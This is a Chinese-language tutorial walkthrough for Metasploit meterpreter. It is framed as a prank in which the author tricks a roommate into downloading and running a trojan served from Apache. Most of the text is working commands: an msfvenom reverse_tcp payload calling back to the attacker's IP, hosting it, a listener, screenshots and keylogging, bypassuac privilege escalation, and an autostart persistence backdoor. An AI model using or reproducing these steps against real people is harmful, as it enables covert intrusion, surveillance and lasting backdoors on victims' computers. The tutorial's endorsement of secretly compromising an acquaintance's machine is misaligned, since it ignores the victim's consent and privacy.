滲透之meterpreter
模擬場景:小明是我室友,整天游戲人生,渾渾噩噩,前途迷茫,每次上課交作業都要看我的,於是我開啟了apche服務器,給他下載作業(別問我為什么不用QQ傳,因為要裝逼!),他無意中看到我的一些其他軟件,並也一起打包下載了,並且運行了一個*.exe程序,嘿嘿,從此他的電腦上便再無秘密可言。
0x1.實驗環境
VMware
kali(linux)系統 kali ip:192.168.127.128
windows 7專業版
kali鏡像官方下載地址->>https://www.kali.org/downloads/
0x2.開始實驗
0x2.1.終端進入msfconsole控制台
輸入->>msfconsole 回車即可
生成木馬程序
輸入->>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.127.128 LPORT=4444 -f exe > 1.exe
提示:命令中的ip地址為kali IP地址,端口號可自行設定(盡量設置為不常用端口號),1.exe為木馬程序,名字隨意,由.exe結尾即可。
開啟一個新終端
開啟apache服務,將默認主頁刪除並復制1.exe文件到該目錄下
輸入->>service apache2 start
->>rm /var/www/html/*
->>cp 1.exe /var/www/html/
win7在同一局域網內主機就可以訪問到:http://192.168.127.128:80
win7點擊1.exe文件即可下載,現在我們將該文件下載下來放到桌面上運行。
回到kali的msf上,使用監聽模塊,設置一些參數,輸入options即可查看需要設置的參數。
輸入->>use exploit/multi/handler
->>set payload windows/meterpreter/reverse_tcp
->>set LHost 192.168.127.128
->>set LPORT 4444
提示:IP為kali IP地址,端口為之前生成1.exe時端口,默認端口為4444
執行exploit即可連上win7了
查看當前權限
輸入命令->>getuid
顯示系統權限,那就可以做很多事情了。
可能做到這里就只有用戶權限了,那也是沒關系的!
可以先試試獲取遠端桌面截屏,記錄鍵盤等
截屏操作
輸入->>screenshot
還有就是鍵盤記錄,你輸了什么我都知道,哈哈哈。
如果不是system權限或administrator權限就需要提權。
shell命令打開win7終端
提權
說明:本來我第一次做的時候拿到的也是用戶權限,找了一些資料,試了幾種方法均未成功,后來看到一篇win7提權的,終於成功了!
以exploit/windows/local/bypassuac模塊為例
該模塊在windows 32位和64位下都有效。
msf > use exploit/windows/local/bypassuac ->> set session 2 ->> exploit
用sessions命令就可以看到自己的編號了,我這里是2
植入后門
提升權限完第一件事就是留后門了。
現在只不過是放了一個馬而已,下次啟動就不運行了,這怎么行!所以我們得留個后門啊!
輸入->>run persistence -X -i 5 -p 4444 -r 192.168.127.128

-X為開機自啟 -i為反向連接
metsvc攻擊
開啟一個會話服務
輸入->>run metsvc

win7上已經有了。

參考來自-》》https://xz.aliyun.com/t/2536#toc-2
-》》https://paper.seebug.org/29/
提權文章使用的是->>https://www.cnblogs.com/wh4am1/p/6602650.html方法,可以嘗試其他方法進行提權哦!